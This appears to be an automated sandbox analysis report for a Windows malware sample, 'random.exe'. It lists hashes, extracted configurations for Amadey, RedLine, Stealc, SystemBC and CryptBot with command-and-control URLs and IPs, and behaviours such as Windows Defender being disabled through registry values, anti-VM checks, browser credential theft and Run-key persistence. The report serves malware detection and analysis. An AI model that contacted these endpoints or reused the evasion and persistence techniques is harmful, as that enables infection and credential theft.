Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 23:17
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
random.exe
Resource
win10v2004-20250217-en
General
-
Target
random.exe
-
Size
2.1MB
-
MD5
57dbb3339312da8b04a3e067ca47dcae
-
SHA1
2a5c573173a5b8b770a955ade295720e6d634cbb
-
SHA256
4baf8a7e88b5ef57ea5ac4db9a9b3ed867170305bf0ddf59f7f87b8d823cfe14
-
SHA512
340ec0e6bfef7e04b11ffa13c838aac83933d6a75869a4c7c41b188df1a501d621c607f40b75aa3516c4a662e0e4c575f5b15cb138721b7cf47e73e7051d50d4
-
SSDEEP
49152:vIkSVA3kJEuWX8Xzeiqhx+mpiME+a6Xty0afl:vIky7JEuWX8XyiQJfOfl
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
cryptbot
http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17
Signatures
-
Amadey family
-
Cryptbot family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5104-177-0x0000000000CD0000-0x0000000001144000-memory.dmp healer behavioral2/memory/5104-178-0x0000000000CD0000-0x0000000001144000-memory.dmp healer behavioral2/memory/5104-318-0x0000000000CD0000-0x0000000001144000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/5008-270-0x0000000000DA0000-0x0000000001218000-memory.dmp family_sectoprat behavioral2/memory/5008-271-0x0000000000DA0000-0x0000000001218000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 8ca656b8af.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ onrlju.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ubhq.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e14272126a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f68b49190.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c550466aee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4519c4ed8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f44de5325.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8ca656b8af.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 05bc0d252e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0ffe1f7c77.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ubhq.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4ddd11db3b.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 21 3468 powershell.exe 24 3296 powershell.exe 164 5856 powershell.exe 186 3448 powershell.exe 189 3448 powershell.exe 208 3448 powershell.exe 218 3448 powershell.exe 225 3448 powershell.exe 237 3448 powershell.exe 239 3448 powershell.exe 244 3448 powershell.exe 246 3448 powershell.exe 250 3448 powershell.exe 263 3448 powershell.exe 265 3448 powershell.exe 273 3448 powershell.exe 274 3448 powershell.exe 276 3448 powershell.exe 278 3448 powershell.exe 279 3448 powershell.exe 280 3448 powershell.exe 281 3448 powershell.exe 282 3448 powershell.exe 283 3448 powershell.exe 284 3448 powershell.exe 285 3448 powershell.exe 287 3448 powershell.exe 288 3448 powershell.exe 289 3448 powershell.exe 290 3448 powershell.exe 291 3448 powershell.exe 292 3448 powershell.exe 293 3448 powershell.exe 303 3448 powershell.exe 304 3448 powershell.exe 310 3448 powershell.exe 313 3448 powershell.exe 316 3448 powershell.exe 317 3448 powershell.exe 319 3448 powershell.exe 320 3448 powershell.exe 321 3448 powershell.exe 323 3448 powershell.exe 325 3448 powershell.exe 326 3448 powershell.exe 328 3448 powershell.exe 330 3448 powershell.exe 331 3448 powershell.exe 332 3448 powershell.exe 333 3448 powershell.exe 335 3448 powershell.exe 337 3448 powershell.exe 339 3448 powershell.exe 340 3448 powershell.exe 341 3448 powershell.exe 343 3448 powershell.exe 346 3448 powershell.exe 347 3448 powershell.exe 348 3448 powershell.exe 349 3448 powershell.exe 352 3448 powershell.exe 353 3448 powershell.exe 354 3448 powershell.exe 355 3448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3468 powershell.exe 3296 powershell.exe 5856 powershell.exe 5884 powershell.exe 3284 powershell.exe 1248 powershell.exe 5148 powershell.exe 3136 powershell.exe -
Downloads MZ/PE file 38 IoCs
flow pid Process 155 3656 futors.exe 38 3656 futors.exe 38 3656 futors.exe 38 3656 futors.exe 38 3656 futors.exe 21 3468 powershell.exe 24 3296 powershell.exe 91 3656 futors.exe 164 5856 powershell.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 11 1152 skotes.exe 19 1152 skotes.exe 19 1152 skotes.exe 19 1152 skotes.exe 19 1152 skotes.exe 19 1152 skotes.exe 173 1072 e14272126a.exe 173 1072 e14272126a.exe 173 1072 e14272126a.exe 173 1072 e14272126a.exe 173 1072 e14272126a.exe 173 1072 e14272126a.exe 204 5136 BitLockerToGo.exe -
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4864 chrome.exe 5056 chrome.exe 5504 msedge.exe 5692 msedge.exe 1376 chrome.exe 5672 chrome.exe 1420 chrome.exe 1692 chrome.exe 5680 msedge.exe 5992 chrome.exe 6112 msedge.exe 5264 chrome.exe 1072 chrome.exe 4808 chrome.exe 2812 chrome.exe 5444 msedge.exe 3196 chrome.exe -
Checks BIOS information in registry 2 TTPs 46 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8ca656b8af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c550466aee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c550466aee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4519c4ed8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0ffe1f7c77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ubhq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f68b49190.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 05bc0d252e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e14272126a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ubhq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f68b49190.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f44de5325.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f44de5325.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0ffe1f7c77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e14272126a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion onrlju.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ubhq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ubhq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ddd11db3b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ddd11db3b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8ca656b8af.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 05bc0d252e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4519c4ed8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion onrlju.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation 8ca656b8af.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation random.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 64 IoCs
pid Process 1152 skotes.exe 3660 skotes.exe 4312 f3Ypd8O.exe 4212 f3Ypd8O.exe 4848 f3Ypd8O.exe 3236 f3Ypd8O.exe 3696 f3Ypd8O.exe 1528 f3Ypd8O.exe 2324 oKUl4yo.exe 4724 kdMujZh.exe 1148 7522e4c07b.exe 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 3608 amnew.exe 3656 futors.exe 3488 ubhq.exe 5008 0f68b49190.exe 4280 483d2fa8a0d53818306efeb32d3.exe 1360 4ddd11db3b.exe 3476 8ca656b8af.exe 5076 trano1221.exe 4888 trano1221.exe 2396 05bc0d252e.exe 1428 con12312211221.exe 4364 con12312211221.exe 5064 c550466aee.exe 4596 monthdragon.exe 4704 monthdragon.exe 3668 0ffe1f7c77.exe 4788 12321321.exe 4340 alex12112.exe 3620 alex12112.exe 1072 e14272126a.exe 4408 fher.exe 2608 fher.exe 1528 fher.exe 4456 fher.exe 4812 fher.exe 4008 fher.exe 3596 skotes.exe 3844 futors.exe 5220 e4519c4ed8.exe 5644 e1c4702da7.exe 5748 3f44de5325.exe 5468 TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE 5664 d2YQIJa.exe 3668 7aencsM.exe 5736 7aencsM.exe 6076 7aencsM.exe 5364 DTQCxXZ.exe 6056 9aiiMOQ.exe 3944 9aiiMOQ.exe 3380 9aiiMOQ.exe 6032 YMci4Rc.exe 1592 YMci4Rc.exe 4980 NL58452.exe 5720 NL58452.exe 5216 kdMujZh.exe 4528 oKUl4yo.exe 3088 Bjkm5hE.exe 5904 Bjkm5hE.exe 5880 Bjkm5hE.exe 6128 Bjkm5hE.exe 5236 onrlju.exe 2292 service123.exe -
Identifies Wine through registry keys 2 TTPs 23 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine ubhq.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 05bc0d252e.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 0ffe1f7c77.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine e14272126a.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 3f44de5325.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 0f68b49190.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 4ddd11db3b.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine ubhq.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 8ca656b8af.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine e4519c4ed8.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine c550466aee.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine onrlju.exe -
Loads dropped DLL 35 IoCs
pid Process 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 4888 trano1221.exe 1072 e14272126a.exe 1072 e14272126a.exe 2292 service123.exe 1592 service123.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7522e4c07b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088255101\\7522e4c07b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088256021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0ffe1f7c77.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088328001\\0ffe1f7c77.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e14272126a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088329001\\e14272126a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e4519c4ed8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008930101\\e4519c4ed8.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e1c4702da7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088331001\\e1c4702da7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3f44de5325.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008940101\\3f44de5325.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 342 api.ipify.org 343 api.ipify.org -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00070000000229d7-103.dat autoit_exe behavioral2/files/0x0009000000023c8c-1148.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
pid Process 3628 random.exe 1152 skotes.exe 3660 skotes.exe 4724 kdMujZh.exe 5104 TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE 3488 ubhq.exe 5008 0f68b49190.exe 4280 483d2fa8a0d53818306efeb32d3.exe 1360 4ddd11db3b.exe 3476 8ca656b8af.exe 2396 05bc0d252e.exe 5064 c550466aee.exe 3668 0ffe1f7c77.exe 1072 e14272126a.exe 3596 skotes.exe 5220 e4519c4ed8.exe 5748 3f44de5325.exe 5468 TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE 5664 d2YQIJa.exe 5216 kdMujZh.exe 5236 onrlju.exe 3392 ubhq.exe 5688 skotes.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 4312 set thread context of 1528 4312 f3Ypd8O.exe 96 PID 1428 set thread context of 4364 1428 con12312211221.exe 143 PID 4596 set thread context of 4704 4596 monthdragon.exe 148 PID 4340 set thread context of 3620 4340 alex12112.exe 156 PID 4408 set thread context of 4008 4408 fher.exe 165 PID 3668 set thread context of 6076 3668 7aencsM.exe 213 PID 5748 set thread context of 5136 5748 3f44de5325.exe 217 PID 6056 set thread context of 3380 6056 9aiiMOQ.exe 232 PID 6032 set thread context of 1592 6032 YMci4Rc.exe 240 PID 4980 set thread context of 5720 4980 NL58452.exe 244 PID 3088 set thread context of 6128 3088 Bjkm5hE.exe 263 -
resource yara_rule behavioral2/files/0x0007000000023d13-792.dat upx behavioral2/memory/4888-796-0x00007FFD19100000-0x00007FFD196E9000-memory.dmp upx behavioral2/files/0x0009000000023c4c-798.dat upx behavioral2/memory/4888-804-0x00007FFD2D3B0000-0x00007FFD2D3D3000-memory.dmp upx behavioral2/files/0x0007000000023d0f-803.dat upx behavioral2/memory/4888-814-0x00007FFD2D4A0000-0x00007FFD2D4AF000-memory.dmp upx behavioral2/memory/4888-815-0x00007FFD2A740000-0x00007FFD2A759000-memory.dmp upx behavioral2/memory/4888-816-0x00007FFD2D490000-0x00007FFD2D49D000-memory.dmp upx behavioral2/memory/4888-817-0x00007FFD2A410000-0x00007FFD2A429000-memory.dmp upx behavioral2/memory/4888-818-0x00007FFD28FD0000-0x00007FFD28FFD000-memory.dmp upx behavioral2/memory/4888-819-0x00007FFD28F90000-0x00007FFD28FC6000-memory.dmp upx behavioral2/memory/4888-822-0x00007FFD281A0000-0x00007FFD281D3000-memory.dmp upx behavioral2/memory/4888-821-0x00007FFD2D360000-0x00007FFD2D36D000-memory.dmp upx behavioral2/memory/4888-824-0x00007FFD18B10000-0x00007FFD18BDD000-memory.dmp upx behavioral2/memory/4888-823-0x00007FFD19100000-0x00007FFD196E9000-memory.dmp upx behavioral2/memory/4888-827-0x00007FFD2D3B0000-0x00007FFD2D3D3000-memory.dmp upx behavioral2/memory/4888-826-0x00007FFD18BE0000-0x00007FFD19100000-memory.dmp upx behavioral2/memory/4888-830-0x00007FFD2A740000-0x00007FFD2A759000-memory.dmp upx behavioral2/memory/4888-833-0x00007FFD28170000-0x00007FFD28196000-memory.dmp upx behavioral2/memory/4888-834-0x00007FFD18890000-0x00007FFD189AC000-memory.dmp upx behavioral2/memory/4888-837-0x00007FFD28B60000-0x00007FFD28B72000-memory.dmp upx behavioral2/memory/4888-836-0x00007FFD21A80000-0x00007FFD21AC3000-memory.dmp upx behavioral2/memory/4888-835-0x00007FFD28F90000-0x00007FFD28FC6000-memory.dmp upx behavioral2/memory/4888-832-0x00007FFD2A650000-0x00007FFD2A65B000-memory.dmp upx behavioral2/memory/4888-831-0x00007FFD28F70000-0x00007FFD28F84000-memory.dmp upx 